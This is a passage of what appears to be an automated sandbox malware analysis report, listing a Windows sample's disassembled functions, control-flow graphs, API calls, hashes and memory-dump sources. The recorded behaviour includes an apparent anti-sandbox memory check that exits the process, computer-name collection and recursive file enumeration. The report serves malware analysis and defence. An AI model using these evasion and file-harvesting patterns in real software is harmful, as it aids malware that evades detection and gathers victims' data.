                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 4a058b9cf0140bf028536971e5bdb1216c793b3f4268e5a8e480f87b073b5a1e
                                • Instruction ID: 0dacbf5bcb493939537d65187fd7e8f91a708eb61253103e9d77a2a451a411c0
                                • Opcode Fuzzy Hash: 4a058b9cf0140bf028536971e5bdb1216c793b3f4268e5a8e480f87b073b5a1e
                                • Instruction Fuzzy Hash: A801D171740204BBEB204A756C1AFBA77ADF786B01F208019F744E7281DDB1E9008A68
                                Function 006DEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 6dee90-6deeb5 call 6c2930 2808 6deec9-6deecd call 6c6c40 2805->2808 2809 6deeb7-6deebf 2805->2809 2812 6deed2-6deee8 StrCmpCA 2808->2812 2809->2808 2810 6deec1-6deec3 lstrcpy 2809->2810 2810->2808 2813 6deeea-6def02 call 6c2a20 call 6c2930 2812->2813 2814 6def11-6def18 call 6c2a20 2812->2814 2824 6def45-6defa0 call 6c2a20 * 10 2813->2824 2825 6def04-6def0c 2813->2825 2819 6def20-6def28 2814->2819 2819->2819 2821 6def2a-6def37 call 6c2930 2819->2821 2821->2824 2829 6def39 2821->2829 2825->2824 2828 6def0e-6def0f 2825->2828 2831 6def3e-6def3f lstrcpy 2828->2831 2829->2831 2831->2824
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006DEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006DEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: c2aa5439f1322b6ef7e81d49da0c75bec808b765efaf869bbf3d5331868e5b52
                                • Instruction ID: d105391e3fff50675034f633865b3810e4917da44a662457b42d250f0e9f8574
                                • Opcode Fuzzy Hash: c2aa5439f1322b6ef7e81d49da0c75bec808b765efaf869bbf3d5331868e5b52
                                • Instruction Fuzzy Hash: A221CE70A202469BCB61BFBAD85AFBA77A6EF14300F04546DBC4EDB352DE31D8508794
                                Function 006C10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 6c10c0-6c10cb 2887 6c10d0-6c10dc 2886->2887 2889 6c10de-6c10f3 GlobalMemoryStatusEx 2887->2889 2890 6c10f5-6c1106 2889->2890 2891 6c1112-6c1114 ExitProcess 2889->2891 2892 6c1108 2890->2892 2893 6c111a-6c111d 2890->2893 2892->2891 2894 6c110a-6c1110 2892->2894 2894->2891 2894->2893
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 2d39bb3dd707fd6b5a463ce42369dd922fc0064cf991773f3a57fc712cc5ef13
                                • Instruction ID: a159f34a4550ed132e1959177c8dbb9dabbad349cf80f6b326d6ddbb6adc1cd2
                                • Opcode Fuzzy Hash: 2d39bb3dd707fd6b5a463ce42369dd922fc0064cf991773f3a57fc712cc5ef13
                                • Instruction Fuzzy Hash: D7F0E2702082449BEB106A64980AF39F7DAEB13350F24092DDE9ACA282EA34C8408127
                                Function 006D8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 6d8c88-6d8cc4 StrCmpCA 2898 6d8ccd-6d8ce6 2895->2898 2899 6d8cc6-6d8cc7 ExitProcess 2895->2899 2901 6d8cec-6d8cf1 2898->2901 2902 6d8ee2-6d8eef call 6c2a20 2898->2902 2903 6d8cf6-6d8cf9 2901->2903 2905 6d8cff 2903->2905 2906 6d8ec3-6d8edc 2903->2906 2908 6d8e6f-6d8e7d StrCmpCA 2905->2908 2909 6d8e88-6d8e9a lstrlen 2905->2909 2910 6d8d84-6d8d92 StrCmpCA 2905->2910 2911 6d8da4-6d8db8 StrCmpCA 2905->2911 2912 6d8d06-6d8d15 lstrlen 2905->2912 2913 6d8dbd-6d8dcb StrCmpCA 2905->2913 2914 6d8ddd-6d8deb StrCmpCA 2905->2914 2915 6d8dfd-6d8e0b StrCmpCA 2905->2915 2916 6d8e1d-6d8e2b StrCmpCA 2905->2916 2917 6d8e3d-6d8e4b StrCmpCA 2905->2917 2918 6d8d5a-6d8d69 lstrlen 2905->2918 2919 6d8e56-6d8e64 StrCmpCA 2905->2919 2920 6d8d30-6d8d3f lstrlen 2905->2920 2906->2902 2942 6d8cf3 2906->2942 2908->2906 2933 6d8e7f-6d8e86 2908->2933 2934 6d8e9c-6d8ea1 call 6c2a20 2909->2934 2935 6d8ea4-6d8eb0 call 6c2930 2909->2935 2910->2906 2924 6d8d98-6d8d9f 2910->2924 2911->2906 2929 6d8d1f-6d8d2b call 6c2930 2912->2929 2930 6d8d17-6d8d1c call 6c2a20 2912->2930 2913->2906 2925 6d8dd1-6d8dd8 2913->2925 2914->2906 2926 6d8df1-6d8df8 2914->2926 2915->2906 2927 6d8e11-6d8e18 2915->2927 2916->2906 2928 6d8e31-6d8e38 2916->2928 2917->2906 2931 6d8e4d-6d8e54 2917->2931 2921 6d8d6b-6d8d70 call 6c2a20 2918->2921 2922 6d8d73-6d8d7f call 6c2930 2918->2922 2919->2906 2932 6d8e66-6d8e6d 2919->2932 2936 6d8d49-6d8d55 call 6c2930 2920->2936 2937 6d8d41-6d8d46 call 6c2a20 2920->2937 2921->2922 2955 6d8eb3-6d8eb5 2922->2955 2924->2906 2925->2906 2926->2906 2927->2906 2928->2906 2929->2955 2930->2929 2931->2906 2932->2906 2933->2906 2934->2935 2935->2955 2936->2955 2937->2936 2942->2903 2955->2906 2956 6d8eb7-6d8eb9 2955->2956 2956->2906 2957 6d8ebb-6d8ebd lstrcpy 2956->2957 2957->2906
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 2e2d22989a2d6eec2f7641925adcaaf64a0245f3dc7c13d3eee6d46de2f51515
                                • Instruction ID: 53762d37650e7ea42f8839bc37b43bd0ae6da40fe8d114a9ffda4719aef4c0f4
                                • Opcode Fuzzy Hash: 2e2d22989a2d6eec2f7641925adcaaf64a0245f3dc7c13d3eee6d46de2f51515
                                • Instruction Fuzzy Hash: 0EE0DF6050038DFBDB00AFB99C48EDA7B69BF84700F00843AFE4997221EE749E04C368
                                Function 006E2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2958 6e2ad0-6e2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 6e2b44-6e2b59 2958->2959 2960 6e2b24-6e2b36 2958->2960
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006E2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 006E2B1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 75e07cf636fd31817732d7631bc56923f923d2da84614cd40db595a81dc8d4f5
                                • Instruction ID: 9648d6193823434fc1f8f9db5cff1e5bee0bb73c5b0c53955ec75ff4acfa2f4b
                                • Opcode Fuzzy Hash: 75e07cf636fd31817732d7631bc56923f923d2da84614cd40db595a81dc8d4f5
                                • Instruction Fuzzy Hash: 6201A272A44648ABC710CF99EC45BAAF7B8F744B21F00026AF915D3780DB751900C6A1

                                Non-executed Functions

                                Function 006D2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D2402
                                • lstrlen.KERNEL32(\*.*), ref: 006D240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006D2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 6f05832faf7adeb9786dde3335aba9406db247687e41a2a87694414feee3b635
                                • Instruction ID: d4e07713a9511edd318e4f1623b50e31cef1467dbbf68a9826ad3ea666eb0574
                                • Opcode Fuzzy Hash: 6f05832faf7adeb9786dde3335aba9406db247687e41a2a87694414feee3b635
                                • Instruction Fuzzy Hash: FCA23571A116179BCB21AFB6DCA8FBA77BABF54300F044029E84AA7351DB34DD41CB90
                                Function 006C16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C16E2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C176C
                                • lstrcat.KERNEL32(00000000), ref: 006C1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1875
                                • lstrcat.KERNEL32(00000000), ref: 006C187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C18FE
                                • lstrlen.KERNEL32(006F1794), ref: 006C1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1929
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1966
                                • lstrlen.KERNEL32(\*.*), ref: 006C1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006C199A
                                  • Part of subcall function 006E4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 006E406D
                                  • Part of subcall function 006E4040: lstrcpy.KERNEL32(00000000,?), ref: 006E40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1A16
                                • lstrlen.KERNEL32(006F1794), ref: 006C1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A41
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1A81
                                • lstrlen.KERNEL32(006F1794), ref: 006C1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1AAC
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006C1B45
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006C1B70
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006C1B8A
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1C03
                                • lstrlen.KERNEL32(006F1794), ref: 006C1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1C31
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1C74
                                • lstrlen.KERNEL32(006F1794), ref: 006C1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1CA2
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1CAE
                                • lstrlen.KERNEL32(?), ref: 006C1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1CE9
                                • lstrlen.KERNEL32(006F1794), ref: 006C1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1D14
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1DEB
                                • lstrlen.KERNEL32(006F1794), ref: 006C1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1E19
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1E56
                                • lstrlen.KERNEL32(006F1794), ref: 006C1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1E81
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1E8D
                                • lstrlen.KERNEL32(?), ref: 006C1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006C1F45
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1F9F
                                • lstrlen.KERNEL32(00F18A10), ref: 006C1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1FE3
                                • lstrlen.KERNEL32(006F1794), ref: 006C1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C200E
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C204D
                                • lstrlen.KERNEL32(006F1794), ref: 006C2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2075
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: f11c317e96ff14560ba362772b6953406dc52fc0efe46de956c3d700c30f926e
                                • Instruction ID: 5e5cd1af7b5e512f1e21b8c60adac23d0a88ce926d96f6bb075132833488ebc3
                                • Opcode Fuzzy Hash: f11c317e96ff14560ba362772b6953406dc52fc0efe46de956c3d700c30f926e
                                • Instruction Fuzzy Hash: 7792397191161A9BCB21AFA5D998FBE77BAFF46700F04412CF809AB251DB34DD41CBA0
                                Function 006CDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDBEF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006CDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC17
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006CDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC4C
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDC8F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006CDCD0
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006CDCF0
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006CDD0A
                                • lstrlen.KERNEL32(006ECFEC), ref: 006CDD1D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDD7B
                                • lstrlen.KERNEL32(006F1794), ref: 006CDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDDA3
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDDAF
